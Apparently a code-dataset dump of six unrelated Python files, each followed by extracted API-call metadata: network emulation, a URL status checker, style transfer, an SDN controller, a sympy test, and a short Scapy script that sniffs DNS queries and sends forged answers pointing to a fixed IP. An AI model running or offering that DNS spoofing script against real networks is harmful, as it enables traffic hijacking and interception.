if htb:
# Create an htb that assigns class 11 by default.
yield 'tc qdisc replace dev {} root handle 1: htb default 1'.format(
dev)
# We add no filters, so no other classes than 1 will be used.
# Apply the config to the default class.
# We need to add a classid, so children can reference it.
yield 'tc class add dev {} parent 1: classid 1:1 htb {}'.format(
dev, htb)
# At this point, class 1:1 has the default pfifo_fast.
# Now we add netem to that.
if netem:
yield 'tc qdisc add dev {} parent 1:1 handle 10: netem {}'.format(
dev, netem)
else:
yield 'tc qdisc replace dev {} root netem {}'.format(dev, netem)
if __name__ == '__main__':
if '-v' in sys.argv:
log.info('Verbose mode.')
log.setLevel(level=logging.DEBUG)
with open('netz.yml') as f:
config = yaml.safe_load(f.read())
name = compose_name()
log.info('Using project name "{}".'.format(name))
# name->instance for all networks in the Compose project.
nets = {n.attrs['Labels']['com.docker.compose.network']: n for n in
project_networks(name)}
# Ditto for containers.
cons = {c.labels['com.docker.compose.service']: c for c in
project_containers(name)}
# Iterate top level (network names).
for net_name, net_cfg in config.items():
log.debug('In network {}'.format(net_name))
# Get network instance by name.
try:
net = nets[net_name]
except KeyError as e:
log.error('Network "{}" not found.'.format(net_name))
exit(1)
# Iterate second level (container name -> link config)
for con_name, link_cfg in net_cfg.items():
# Get container instance by name.
try:
con = cons[con_name]
except KeyError as e:
log.error('Container "{}" not found.'.format(con_name))
exit(1)
# Get device for container in network
dev = interface_in_net(con, net)
log.debug('Applying to {}: {}'.format(con_name, link_cfg))
try:
for cmd in tc_commands(dev, link_cfg):
raising_exec(con, cmd)
except RuntimeError as e:
log.error(('Error applying "{}" to container "{}" in network '
'"{}": {}').format(cmd, con_name, net_name, e))
exit(1)
| [
"logging.basicConfig",
"docker.from_env",
"socket.gethostname",
"logging.getLogger"
] | [((112, 129), 'docker.from_env', 'docker.from_env', ([], {}), '()\n', (127, 129), False, 'import docker\n'), ((131, 170), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.INFO'}), '(level=logging.INFO)\n', (150, 170), False, 'import logging\n'), ((177, 202), 'logging.getLogger', 'logging.getLogger', (['"""netz"""'], {}), "('netz')\n", (194, 202), False, 'import logging\n'), ((310, 330), 'socket.gethostname', 'socket.gethostname', ([], {}), '()\n', (328, 330), False, 'import socket\n')] |
#Program to fetch the http status code give the url/api
from urllib.request import urlopen
from urllib.error import URLError, HTTPError
import emoji
#Taking input url from user
requestURL = input("Enter the URL to be invoked: ")
#Gets the response from URL and prints the status code and message accordingly
try:
response = urlopen(requestURL)
#In case of success, prints success status code
print('Status code : ' + str(response.code))
print('Message : ' + 'Request succeeded. Request returned message - ' + response.reason)
except HTTPError as e:
#In case of request failure, prints HTTP error status code
print('Status : ' + str(e.code))
print('Message : Request failed. Request returned reason - ' + e.reason)
except URLError as e:
#In case of bad URL or connection failure, prints Win Error
print('Status :', str(e.reason).split(']')[0].replace('[',''))
print('Message : '+ str(e.reason).split(']')[1])
| [
"urllib.request.urlopen"
] | [((330, 349), 'urllib.request.urlopen', 'urlopen', (['requestURL'], {}), '(requestURL)\n', (337, 349), False, 'from urllib.request import urlopen\n')] |
import re
import torch
from torchvision import transforms
import users.neural_transfer.utils as utils
from users.neural_transfer.transformer_net import TransformerNet
from users.neural_transfer.vgg import Vgg16
def stylize(image):
device = torch.device('cpu')
content_image = utils.load_image(image)
content_transform = transforms.Compose([
transforms.ToTensor(),
transforms.Lambda(lambda x: x.mul(255))
])
content_image = content_transform(content_image)
content_image = content_image.unsqueeze(0).to(device)
with torch.no_grad():
style_model = TransformerNet()
# 更改此处模型文件可以更改不同风格
state_dict = torch.load('users/config/mosaic.pth')
# remove saved deprecated running_* keys in InstanceNorm from the checkpoint
for k in list(state_dict.keys()):
if re.search(r'in\d+\.running_(mean|var)$', k):
del state_dict[k]
style_model.load_state_dict(state_dict)
style_model.to(device)
output = style_model(content_image).cpu()
output_path = image.split('.')[0] + '_transfer.jpg'
utils.save_image(output_path, output[0])
| [
"re.search",
"torch.load",
"users.neural_transfer.transformer_net.TransformerNet",
"users.neural_transfer.utils.save_image",
"users.neural_transfer.utils.load_image",
"torch.no_grad",
"torchvision.transforms.ToTensor",
"torch.device"
] | [((245, 264), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (257, 264), False, 'import torch\n'), ((283, 306), 'users.neural_transfer.utils.load_image', 'utils.load_image', (['image'], {}), '(image)\n', (299, 306), True, 'import users.neural_transfer.utils as utils\n'), ((1010, 1050), 'users.neural_transfer.utils.save_image', 'utils.save_image', (['output_path', 'output[0]'], {}), '(output_path, output[0])\n', (1026, 1050), True, 'import users.neural_transfer.utils as utils\n'), ((532, 547), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (545, 547), False, 'import torch\n'), ((565, 581), 'users.neural_transfer.transformer_net.TransformerNet', 'TransformerNet', ([], {}), '()\n', (579, 581), False, 'from users.neural_transfer.transformer_net import TransformerNet\n'), ((618, 655), 'torch.load', 'torch.load', (['"""users/config/mosaic.pth"""'], {}), "('users/config/mosaic.pth')\n", (628, 655), False, 'import torch\n'), ((351, 372), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (370, 372), False, 'from torchvision import transforms\n'), ((777, 821), 're.search', 're.search', (['"""in\\\\d+\\\\.running_(mean|var)$"""', 'k'], {}), "('in\\\\d+\\\\.running_(mean|var)$', k)\n", (786, 821), False, 'import re\n')] |
from scapy.all import *
from scapy.layers.dns import DNSQR, DNS, DNSRR
from scapy.layers.inet import IP, UDP
def dnsSpoof(packet):
spoofDNS = '192.168.0.7'
dstip = packet[IP].src
srcip = packet[IP].dst
sport = packet[UDP].sport
dport = packet[UDP].dport
if packet.haslayer(DNSQR):
dnsid = packet[DNS].id
qd = packet[DNS].qd
dnsrr = DNSRR(rrname=qd.qname, ttl=10, rdata=spoofDNS)
spoofPacket = IP(dst=dstip, src=srcip) / UDP(dport=sport, sport=dport) /\
DNS(id=dnsid, qd=qd, aa=1, qr=1, an=dnsrr)
send(spoofPacket)
print('+++ SOURCE[{}] -> DEST[{}]'.format(dstip, srcip))
print(spoofPacket.summary())
def main():
print('+++ DNS SPOOF START...')
sniff(filter='udp port 53', store=0, prn=dnsSpoof)
if __name__ == "__main__":
main() | [
"scapy.layers.dns.DNS",
"scapy.layers.dns.DNSRR",
"scapy.layers.inet.UDP",
"scapy.layers.inet.IP"
] | [((383, 429), 'scapy.layers.dns.DNSRR', 'DNSRR', ([], {'rrname': 'qd.qname', 'ttl': '(10)', 'rdata': 'spoofDNS'}), '(rrname=qd.qname, ttl=10, rdata=spoofDNS)\n', (388, 429), False, 'from scapy.layers.dns import DNSQR, DNS, DNSRR\n'), ((534, 576), 'scapy.layers.dns.DNS', 'DNS', ([], {'id': 'dnsid', 'qd': 'qd', 'aa': '(1)', 'qr': '(1)', 'an': 'dnsrr'}), '(id=dnsid, qd=qd, aa=1, qr=1, an=dnsrr)\n', (537, 576), False, 'from scapy.layers.dns import DNSQR, DNS, DNSRR\n'), ((452, 476), 'scapy.layers.inet.IP', 'IP', ([], {'dst': 'dstip', 'src': 'srcip'}), '(dst=dstip, src=srcip)\n', (454, 476), False, 'from scapy.layers.inet import IP, UDP\n'), ((479, 508), 'scapy.layers.inet.UDP', 'UDP', ([], {'dport': 'sport', 'sport': 'dport'}), '(dport=sport, sport=dport)\n', (482, 508), False, 'from scapy.layers.inet import IP, UDP\n')] |
import sqlite3
import json
import logging
from ryu.app.wsgi import ControllerBase, WSGIApplication, route
from ryu.base import app_manager
from ryu.controller import ofp_event
from ryu.controller.handler import MAIN_DISPATCHER, CONFIG_DISPATCHER, DEAD_DISPATCHER
from ryu.controller.handler import set_ev_cls
from ryu.ofproto import ofproto_v1_3
from ryu.lib.packet import packet
from ryu.lib.packet import ethernet
from ryu.lib.packet import udp
from webob import Response
from asymlist import Node, AsymLList
conn = sqlite3.connect('nfv.sqlite')
cur = conn.cursor()
flows = {}
DELTA = 3000
##################
class vnf(Node):
def __init__(self, vnf_id, is_bidirect=True, cur=None):
super().__init__(vnf_id, is_bidirect)
### added iftype bitwise support: 1(01)-out, 2(10)-in, 3(11)-inout
### & 1 - first bit; & 2 - second bit
### Ex. bitwise iftype selection:
### 'select * from vnf where iftype & 2 != 0'
### 'select dpid, in_port, locator_addr from vnf where id=X and iftype & 1 != 0'
cur.execute(''' select dpid, in_port, locator_addr, bidirectional from vnf where id=? and iftype & 2 != 0''', (self.id,))
self.dpid_in, self.port_in, self.locator_addr_in, is_bidirect = cur.fetchone()
logging.debug('Locator addr: %s', self.locator_addr_in)
cur.execute(''' select dpid, in_port, locator_addr from vnf where id=? and iftype & 1 != 0''', (self.id,))
self.dpid_out, self.port_out, self.locator_addr_out = cur.fetchone()
if is_bidirect.lower() == "false":
self.is_bidirect = False
class sfc(AsymLList):
def __init__(self, flow_id, nodeClass=vnf, cur=None):
self.cur = cur
self.cur.execute('''select * from flows where id = ? ''', (flow_id,))
self.flow_spec = cur.fetchone()
if self.flow_spec is None:
logging.debug('Flow %s is not defined', flow_id)
raise ValueError("Flow is not known")
self.flow_dict = {}
self.flows = {}
(self.flow_id, self.name, self.flow_dict['in_port'],
self.flow_dict['eth_dst'], self.flow_dict['eth_src'], self.flow_dict['eth_type'],
self.flow_dict['ip_proto'], self.flow_dict['ipv4_src'], self.flow_dict['ipv4_dst'],
self.flow_dict['tcp_src'], self.flow_dict['tcp_dst'], self.flow_dict['udp_src'],
self.flow_dict['udp_dst'], self.flow_dict['ipv6_src'], self.flow_dict['ipv6_dst'],
self.service_id) = self.flow_spec
if not self.flow_dict['eth_type']:
self.flow_dict['eth_type'] = 0x0800
self.flow_id = int(flow_id)
self.reverse_flow_id = self.flow_id+DELTA
self.flows[self.flow_id] = self.flow_dict
self.flows[self.reverse_flow_id] = sfc_app_cls.reverse_flow(self.flows[self.flow_id])
self.cur.execute('''select vnf_id from service where service_id = ? except select next_vnf_id from service where service_id = ? ''', (self.service_id, self.service_id))
vnf_id = self.cur.fetchone()[0]
super().__init__(vnf_id, is_bidirect=True, nodeClass=nodeClass, cur=self.cur)
self.fill()
def __str__(self):
return str(self.forward())
def append(self):
self.cur.execute('''select next_vnf_id from service where service_id = ? and vnf_id = ? ''', (self.service_id, self.last.id))
next_vnf_id = self.cur.fetchone()[0]
if next_vnf_id is None:
return None
logging.debug('Trying to append %s', next_vnf_id)
return super().append(next_vnf_id, cur=self.cur)
def fill(self):
logging.debug('Filling...')
while self.append():
pass
return self.last
def install_catching_rule(self, sfc_app_cls):
logging.debug("Adding catching rule...")
actions = []
flow_id = self.flow_id
for flow_id in (self.flow_id, self.reverse_flow_id):
for dp in sfc_app_cls.datapaths.values():
match = sfc_app_cls.create_match(dp.ofproto_parser, self.flows[flow_id])
sfc_app_cls.add_flow(dp, 1, match, actions, metadata=flow_id, goto_id=2)
if self.back is None:
break
return Response(status=200)
def delete_rule(self, sfc_app_cls, flow_match):
logging.debug('Deleting rule...')
flow_dict = self.flows[flow_match]
for dp in sfc_app_cls.datapaths.values():
match_del = sfc_app_cls.create_match(dp.ofproto_parser, flow_dict)
sfc_app_cls.del_flow(datapath=dp, match=match_del)
def install_steering_rule(self, sfc_app_cls, dp_entry, in_port_entry, flow_match):
logging.debug("Adding steering rule...")
actions = []
dp = dp_entry
parser = dp.ofproto_parser
flow_dict = self.flows[flow_match]
flow_dict['in_port'] = in_port_entry
match = sfc_app_cls.create_match(parser, flow_dict)
if flow_match < DELTA:
for vnf in self.forward():
#dpid_out = vnf.dpid_out
actions.append(parser.OFPActionSetField(eth_dst=vnf.locator_addr_in))
sfc_app_cls.add_flow(dp, 8, match, actions, goto_id=1)
actions = []
flow_dict['in_port'] = vnf.port_out
dp = sfc_app_cls.datapaths[vnf.dpid_out]
match = sfc_app_cls.create_match(parser, flow_dict)
else:
for vnf in self.backward():
#dpid_out = vnf.dpid_out
actions.append(parser.OFPActionSetField(eth_dst=vnf.locator_addr_out))
sfc_app_cls.add_flow(dp, 8, match, actions, goto_id=1)
actions = []
flow_dict['in_port'] = vnf.port_out
dp = sfc_app_cls.datapaths[vnf.dpid_out]
match = sfc_app_cls.create_match(parser, flow_dict)
#################################
class SFCController(ControllerBase):
def __init__(self, req, link, data, **config):
super(SFCController, self).__init__(req, link, data, **config)
self.sfc_api_app = data['sfc_api_app']
@route('hello', '/{greeting}/{name}', methods=['GET'])
def hello(self, req, **kwargs):
greeting = kwargs['greeting']
name = kwargs['name']
message = greeting +' '+ name
privet = {'message': message}
body = json.dumps(privet)
return Response(content_type='application/json', body=body.encode('utf-8'), status=200)
@route('add-flow', '/add_flow/{flow_id}', methods=['GET'])
def api_add_flow(self, req, **kwargs):
sfc_ap = self.sfc_api_app
flow_id = kwargs['flow_id']
logging.debug('FLOW ID: %s', flow_id)
try:
flows[flow_id] = sfc(flow_id, cur=cur)
except ValueError:
message = {'Result': 'Flow {} is not defined'.format(flow_id)}
body = json.dumps(message)
return Response(content_type='application/json', body=body.encode('utf-8'), status=404)
except TypeError:
message = {'Result': 'DB inconsistency'}
body = json.dumps(message)
return Response(content_type='application/json', body=body.encode('utf-8'), status=500)
logging.debug('SFC: %s', str(flows[flow_id]))
flows[flow_id].install_catching_rule(sfc_ap)
@route('delete-flow', '/delete_flow/{flow_id}', methods=['GET'])
def api_delete_flow(self, req, **kwargs):
'''Deletes flow from the application and clears the corresponding rule from DPs '''
sfc_ap = self.sfc_api_app
flow_id = kwargs['flow_id']
cur.execute('''select * from flows where id = ?''', (kwargs['flow_id'],))
flow_spec = cur.fetchone()
flow_dict = {}
if not flow_spec: return Response(status=404)
(flow_id, name, flow_dict['in_port'], flow_dict['eth_dst'],
flow_dict['eth_src'], flow_dict['eth_type'], flow_dict['ip_proto'],
flow_dict['ipv4_src'], flow_dict['ipv4_dst'], flow_dict['tcp_src'],
flow_dict['tcp_dst'], flow_dict['udp_src'], flow_dict['udp_dst'],
flow_dict['ipv6_src'], flow_dict['ipv6_dst'], service_id) = flow_spec
if not flow_dict['eth_type']: flow_dict['eth_type'] = 0x0800
reverse_flow_dict = sfc_app_cls.reverse_flow(flow_dict)
for flow_dict in (flow_dict, reverse_flow_dict):
for dp in sfc_ap.datapaths.values():
match_del = sfc_ap.create_match(dp.ofproto_parser, flow_dict)
sfc_ap.del_flow(datapath=dp, match=match_del)
try:
del flows[str(flow_id)]
logging.debug('Flow %s deleted', flow_id)
except KeyError:
logging.debug('Flow %s not found, but an attempt to delete it from DPs has been performed', flow_id)
return Response(status=200)
@route('flows', '/flows/{flow_id}', methods=['GET'])
def api_show_flow(self, req, **kwargs):
flow_id = kwargs['flow_id']
try:
body = json.dumps({flow_id:str(flows[flow_id])})
return Response(content_type='application/json', body=body.encode('utf-8'), status=200)
except KeyError:
body = json.dumps({'ERROR':'Flow {} not found/not installed'.format(flow_id)})
return Response(content_type='application/json', body=body.encode('utf-8'), status=404)
@route('flows_all', '/flows', methods=['GET'])
def api_show_flows(self, req):
logging.debug('FLOWS: {}'.format(str(flows)))
body = json.dumps(str(flows))
return Response(content_type='application/json', body=body.encode('utf-8'), status=200)
class sfc_app_cls(app_manager.RyuApp):
OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]
_CONTEXTS = {'wsgi': WSGIApplication}
def __init__(self, *args, **kwargs):
super(sfc_app_cls, self).__init__(*args, **kwargs)
wsgi = kwargs['wsgi']
wsgi.register(SFCController, {'sfc_api_app': self})
self.datapaths = {}
######## database definition
# conn = sqlite3.connect('nfv.sqlite')
# cur = conn.cursor()
# cur.executescript('''
# DROP TABLE IF EXISTS vnf;
# CREATE TABLE vnf (
# id INTEGER NOT NULL,
# name TEXT,
# type_id INTEGER,
# group_id INTEGER,
# geo_location TEXT,
# iftype INTEGER,
# bidirectional BOOLEAN,
# dpid INTEGER,
# in_port INTEGER,
# locator_addr NUMERIC
# PRIMARY KEY(id,iftype)
# );
# create unique index equipment_uind on vnf (name,iftype)
# ''')
# conn.commit()
# cur.close()
######## END of database definition
######### Register/Unregister DataPathes in datapth dictionary
@set_ev_cls(ofp_event.EventOFPStateChange,
[MAIN_DISPATCHER, DEAD_DISPATCHER])
def _state_change_handler(self, ev):
datapath = ev.datapath
if ev.state == MAIN_DISPATCHER:
if not datapath.id in self.datapaths:
self.logger.debug('register datapath: %016x', datapath.id)
self.datapaths[datapath.id] = datapath
elif ev.state == DEAD_DISPATCHER:
if datapath.id in self.datapaths:
self.logger.debug('unregister datapath: %016x', datapath.id)
del self.datapaths[datapath.id]
########## Setting default rules upon DP is connectted
@set_ev_cls(ofp_event.EventOFPSwitchFeatures, CONFIG_DISPATCHER)
def switch_features_handler(self, ev):
datapath = ev.msg.datapath
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
#### Set flow to retrieve registration packet
match = parser.OFPMatch(eth_type=0x0800, ip_proto=17, udp_dst=30012)
actions = [parser.OFPActionOutput(ofproto.OFPP_CONTROLLER, ofproto.OFPCML_NO_BUFFER)]
self.add_flow(datapath, 1, match, actions)
#### Set defaults for table 1 and 2
match = parser.OFPMatch()
actions = []
self.add_flow(datapath, 0, match, actions, goto_id=1)
actions = [parser.OFPActionOutput(ofproto.OFPP_NORMAL,
ofproto.OFPCML_NO_BUFFER)]
self.add_flow(datapath, 0, match, actions, table_id=1)
actions = [parser.OFPActionOutput(ofproto.OFPP_CONTROLLER,
ofproto.OFPCML_NO_BUFFER)]
self.add_flow(datapath, 0, match, actions, table_id=2)
################ Packet_IN handler ####################
@set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def _packet_in_handler(self, ev):
msg = ev.msg
datapath = msg.datapath
ofproto = datapath.ofproto
if msg.reason == ofproto.OFPR_NO_MATCH:
reason = 'NO MATCH'
elif msg.reason == ofproto.OFPR_ACTION:
reason = 'ACTION'
elif msg.reason == ofproto.OFPR_INVALID_TTL:
reason = 'INVALID TTL'
else:
reason = 'unknown'
self.logger.debug('OFPPacketIn received: '
'buffer_id=%x total_len=%d reason=%s '
'table_id=%d cookie=%d match=%s ',
msg.buffer_id, msg.total_len, reason,
msg.table_id, msg.cookie, msg.match)
try:
flow_match = msg.match['metadata']
if msg.match['metadata'] > DELTA:
flow_id = flow_match - DELTA
else:
flow_id = flow_match
in_port_entry = msg.match['in_port']
dp_entry = datapath
####### Deleting catching rules
logging.debug('Deleting catching rules - flow:%d match:%d ...', flow_id, flow_match)
flows[str(flow_id)].delete_rule(self, flow_match)
####### Installing steering rules
logging.debug('Installing steering rules - flow:%d match:%d ...', flow_id, flow_match)
flows[str(flow_id)].install_steering_rule(self, dp_entry, in_port_entry, flow_match)
except KeyError:
flow_match = None
pass
####### VNF self registrtation
in_port = msg.match['in_port']
pkt = packet.Packet(msg.data)
#pkt_arp = pkt.get_protocol(arp.arp)
pkt_eth = pkt.get_protocol(ethernet.ethernet)
#pkt_ip = pkt.get_protocol(ipv4.ipv4)
pkt_udp = pkt.get_protocol(udp.udp)
if pkt_udp:
if pkt_udp.dst_port == 30012:
reg_string = pkt.protocols[-1]
reg_info = json.loads(reg_string)
name = reg_info['register']['name']
vnf_id = reg_info['register']['vnf_id']
logging.debug('VNF ID from reg packet %s', vnf_id)
type_id = reg_info['register']['type_id']
group_id = reg_info['register']['group_id']
geo_location = reg_info['register']['geo_location']
iftype = reg_info['register']['iftype']
bidirectional = reg_info['register']['bidirectional']
dpid = datapath.id
locator_addr = pkt_eth.src
logging.debug("Inserting self-registartion info into DB")
cur.execute('''REPLACE INTO vnf (id, name, type_id,
group_id, geo_location, iftype, bidirectional,
dpid, in_port, locator_addr ) VALUES ( ?, ?, ?,
?, ?, ?, ?, ?, ?, ? )''',
(vnf_id, name, type_id, group_id, geo_location,
iftype, bidirectional, dpid, in_port, locator_addr)
)
cur.execute('SELECT id FROM vnf WHERE name = ? AND iftype = ?',
(name, iftype)
)
vnf_id = cur.fetchone()[0]
conn.commit()
#cur.close()
############# Function definitions #############
def add_flow(self, datapath, priority, match, actions,
buffer_id=None, table_id=0, metadata=None, goto_id=None):
logging.debug("Add flow to DP %d", datapath.id)
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
if goto_id:
#inst = [parser.OFPInstructionActions(ofproto.OFPIT_WRITE_ACTIONS, actions)]
inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS, actions)]
if metadata:
inst.append(parser.OFPInstructionWriteMetadata(metadata, 0xffffffff))
inst.append(parser.OFPInstructionGotoTable(goto_id))
else:
inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS, actions)]
#inst.append(parser.OFPInstructionWriteMetadata(1,0xffffffff))
if buffer_id:
mod = parser.OFPFlowMod(datapath=datapath, buffer_id=buffer_id,
priority=priority, match=match,
instructions=inst, table_id=table_id)
else:
mod = parser.OFPFlowMod(datapath=datapath, priority=priority,
match=match, instructions=inst,
table_id=table_id)
datapath.send_msg(mod)
def del_flow(self, datapath, match):
''' Deletes a flow defined by match from a DP '''
logging.debug("Delele flow from DP %d", datapath.id)
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
mod = parser.OFPFlowMod(datapath=datapath,
command=ofproto.OFPFC_DELETE,
out_port=ofproto.OFPP_ANY,
out_group=ofproto.OFPG_ANY,
match=match)
datapath.send_msg(mod)
def create_match(self, parser, fields):
'''Creates OFP match struct from the list of fields. New API.'''
flow_dict = {}
for k, v in fields.items():
if v is not None:
flow_dict[k] = v
match = parser.OFPMatch(**flow_dict)
return match
def reverse_flow(flow_dict):
'''Creates reverse flow dict '''
reverse_flow_dict = {**flow_dict}
reverse_flow_dict['eth_src'] = flow_dict['eth_dst']
reverse_flow_dict['eth_dst'] = flow_dict['eth_src']
reverse_flow_dict['ipv4_src'] = flow_dict['ipv4_dst']
reverse_flow_dict['ipv4_dst'] = flow_dict['ipv4_src']
reverse_flow_dict['tcp_src'] = flow_dict['tcp_dst']
reverse_flow_dict['tcp_dst'] = flow_dict['tcp_src']
reverse_flow_dict['udp_src'] = flow_dict['udp_dst']
reverse_flow_dict['udp_dst'] = flow_dict['udp_src']
reverse_flow_dict['ipv6_src'] = flow_dict['ipv6_dst']
reverse_flow_dict['ipv6_dst'] = flow_dict['ipv6_src']
return reverse_flow_dict
| [
"ryu.lib.packet.packet.Packet",
"json.loads",
"logging.debug",
"ryu.app.wsgi.route",
"sqlite3.connect",
"json.dumps",
"ryu.controller.handler.set_ev_cls",
"webob.Response"
] | [((519, 548), 'sqlite3.connect', 'sqlite3.connect', (['"""nfv.sqlite"""'], {}), "('nfv.sqlite')\n", (534, 548), False, 'import sqlite3\n'), ((6145, 6198), 'ryu.app.wsgi.route', 'route', (['"""hello"""', '"""/{greeting}/{name}"""'], {'methods': "['GET']"}), "('hello', '/{greeting}/{name}', methods=['GET'])\n", (6150, 6198), False, 'from ryu.app.wsgi import ControllerBase, WSGIApplication, route\n'), ((6515, 6572), 'ryu.app.wsgi.route', 'route', (['"""add-flow"""', '"""/add_flow/{flow_id}"""'], {'methods': "['GET']"}), "('add-flow', '/add_flow/{flow_id}', methods=['GET'])\n", (6520, 6572), False, 'from ryu.app.wsgi import ControllerBase, WSGIApplication, route\n'), ((7369, 7432), 'ryu.app.wsgi.route', 'route', (['"""delete-flow"""', '"""/delete_flow/{flow_id}"""'], {'methods': "['GET']"}), "('delete-flow', '/delete_flow/{flow_id}', methods=['GET'])\n", (7374, 7432), False, 'from ryu.app.wsgi import ControllerBase, WSGIApplication, route\n'), ((8883, 8934), 'ryu.app.wsgi.route', 'route', (['"""flows"""', '"""/flows/{flow_id}"""'], {'methods': "['GET']"}), "('flows', '/flows/{flow_id}', methods=['GET'])\n", (8888, 8934), False, 'from ryu.app.wsgi import ControllerBase, WSGIApplication, route\n'), ((9411, 9456), 'ryu.app.wsgi.route', 'route', (['"""flows_all"""', '"""/flows"""'], {'methods': "['GET']"}), "('flows_all', '/flows', methods=['GET'])\n", (9416, 9456), False, 'from ryu.app.wsgi import ControllerBase, WSGIApplication, route\n'), ((10832, 10909), 'ryu.controller.handler.set_ev_cls', 'set_ev_cls', (['ofp_event.EventOFPStateChange', '[MAIN_DISPATCHER, DEAD_DISPATCHER]'], {}), '(ofp_event.EventOFPStateChange, [MAIN_DISPATCHER, DEAD_DISPATCHER])\n', (10842, 10909), False, 'from ryu.controller.handler import set_ev_cls\n'), ((11493, 11556), 'ryu.controller.handler.set_ev_cls', 'set_ev_cls', (['ofp_event.EventOFPSwitchFeatures', 'CONFIG_DISPATCHER'], {}), '(ofp_event.EventOFPSwitchFeatures, CONFIG_DISPATCHER)\n', (11503, 11556), False, 'from ryu.controller.handler import set_ev_cls\n'), ((12588, 12643), 'ryu.controller.handler.set_ev_cls', 'set_ev_cls', (['ofp_event.EventOFPPacketIn', 'MAIN_DISPATCHER'], {}), '(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)\n', (12598, 12643), False, 'from ryu.controller.handler import set_ev_cls\n'), ((1270, 1325), 'logging.debug', 'logging.debug', (['"""Locator addr: %s"""', 'self.locator_addr_in'], {}), "('Locator addr: %s', self.locator_addr_in)\n", (1283, 1325), False, 'import logging\n'), ((3466, 3515), 'logging.debug', 'logging.debug', (['"""Trying to append %s"""', 'next_vnf_id'], {}), "('Trying to append %s', next_vnf_id)\n", (3479, 3515), False, 'import logging\n'), ((3614, 3641), 'logging.debug', 'logging.debug', (['"""Filling..."""'], {}), "('Filling...')\n", (3627, 3641), False, 'import logging\n'), ((3784, 3824), 'logging.debug', 'logging.debug', (['"""Adding catching rule..."""'], {}), "('Adding catching rule...')\n", (3797, 3824), False, 'import logging\n'), ((4245, 4265), 'webob.Response', 'Response', ([], {'status': '(200)'}), '(status=200)\n', (4253, 4265), False, 'from webob import Response\n'), ((4327, 4360), 'logging.debug', 'logging.debug', (['"""Deleting rule..."""'], {}), "('Deleting rule...')\n", (4340, 4360), False, 'import logging\n'), ((4692, 4732), 'logging.debug', 'logging.debug', (['"""Adding steering rule..."""'], {}), "('Adding steering rule...')\n", (4705, 4732), False, 'import logging\n'), ((6394, 6412), 'json.dumps', 'json.dumps', (['privet'], {}), '(privet)\n', (6404, 6412), False, 'import json\n'), ((6695, 6732), 'logging.debug', 'logging.debug', (['"""FLOW ID: %s"""', 'flow_id'], {}), "('FLOW ID: %s', flow_id)\n", (6708, 6732), False, 'import logging\n'), ((8856, 8876), 'webob.Response', 'Response', ([], {'status': '(200)'}), '(status=200)\n', (8864, 8876), False, 'from webob import Response\n'), ((14248, 14271), 'ryu.lib.packet.packet.Packet', 'packet.Packet', (['msg.data'], {}), '(msg.data)\n', (14261, 14271), False, 'from ryu.lib.packet import packet\n'), ((16183, 16230), 'logging.debug', 'logging.debug', (['"""Add flow to DP %d"""', 'datapath.id'], {}), "('Add flow to DP %d', datapath.id)\n", (16196, 16230), False, 'import logging\n'), ((17451, 17503), 'logging.debug', 'logging.debug', (['"""Delele flow from DP %d"""', 'datapath.id'], {}), "('Delele flow from DP %d', datapath.id)\n", (17464, 17503), False, 'import logging\n'), ((1870, 1918), 'logging.debug', 'logging.debug', (['"""Flow %s is not defined"""', 'flow_id'], {}), "('Flow %s is not defined', flow_id)\n", (1883, 1918), False, 'import logging\n'), ((7816, 7836), 'webob.Response', 'Response', ([], {'status': '(404)'}), '(status=404)\n', (7824, 7836), False, 'from webob import Response\n'), ((8661, 8702), 'logging.debug', 'logging.debug', (['"""Flow %s deleted"""', 'flow_id'], {}), "('Flow %s deleted', flow_id)\n", (8674, 8702), False, 'import logging\n'), ((13699, 13787), 'logging.debug', 'logging.debug', (['"""Deleting catching rules - flow:%d match:%d ..."""', 'flow_id', 'flow_match'], {}), "('Deleting catching rules - flow:%d match:%d ...', flow_id,\n flow_match)\n", (13712, 13787), False, 'import logging\n'), ((13894, 13984), 'logging.debug', 'logging.debug', (['"""Installing steering rules - flow:%d match:%d ..."""', 'flow_id', 'flow_match'], {}), "('Installing steering rules - flow:%d match:%d ...', flow_id,\n flow_match)\n", (13907, 13984), False, 'import logging\n'), ((6918, 6937), 'json.dumps', 'json.dumps', (['message'], {}), '(message)\n', (6928, 6937), False, 'import json\n'), ((7136, 7155), 'json.dumps', 'json.dumps', (['message'], {}), '(message)\n', (7146, 7155), False, 'import json\n'), ((8740, 8850), 'logging.debug', 'logging.debug', (['"""Flow %s not found, but an attempt to delete it from DPs has been performed"""', 'flow_id'], {}), "(\n 'Flow %s not found, but an attempt to delete it from DPs has been performed'\n , flow_id)\n", (8753, 8850), False, 'import logging\n'), ((14598, 14620), 'json.loads', 'json.loads', (['reg_string'], {}), '(reg_string)\n', (14608, 14620), False, 'import json\n'), ((14745, 14795), 'logging.debug', 'logging.debug', (['"""VNF ID from reg packet %s"""', 'vnf_id'], {}), "('VNF ID from reg packet %s', vnf_id)\n", (14758, 14795), False, 'import logging\n'), ((15202, 15259), 'logging.debug', 'logging.debug', (['"""Inserting self-registartion info into DB"""'], {}), "('Inserting self-registartion info into DB')\n", (15215, 15259), False, 'import logging\n')] |
"""
This module tests nipy's uses of aliased sympy expressions.
That is, sympy.Function's whose value is an arbitrary callable.
In these tests, the callable's are scipy.interpolate.interp1d instances
representing approximations to Brownian Motions.
"""
import numpy as np
import scipy.interpolate
import pylab
import sympy
from nipy.modalities.fmri import formula, aliased
def gen_BrownianMotion():
X = np.arange(0,5,0.01)
y = np.random.standard_normal((500,))
Y = np.cumsum(y)*np.sqrt(0.01)
B = scipy.interpolate.interp1d(X, Y, bounds_error=0)
return B
def test_1d():
B = gen_BrownianMotion()
Bs = formula.aliased_function("B", B)
t = sympy.DeferredVector('t')
n={}; aliased._add_aliases_to_namespace(n, Bs)
expr = 3*sympy.exp(Bs(t)) + 4
ee = sympy.lambdify(t, expr, (n, 'numpy'))
np.testing.assert_almost_equal(ee(B.x), 3*np.exp(B.y)+4)
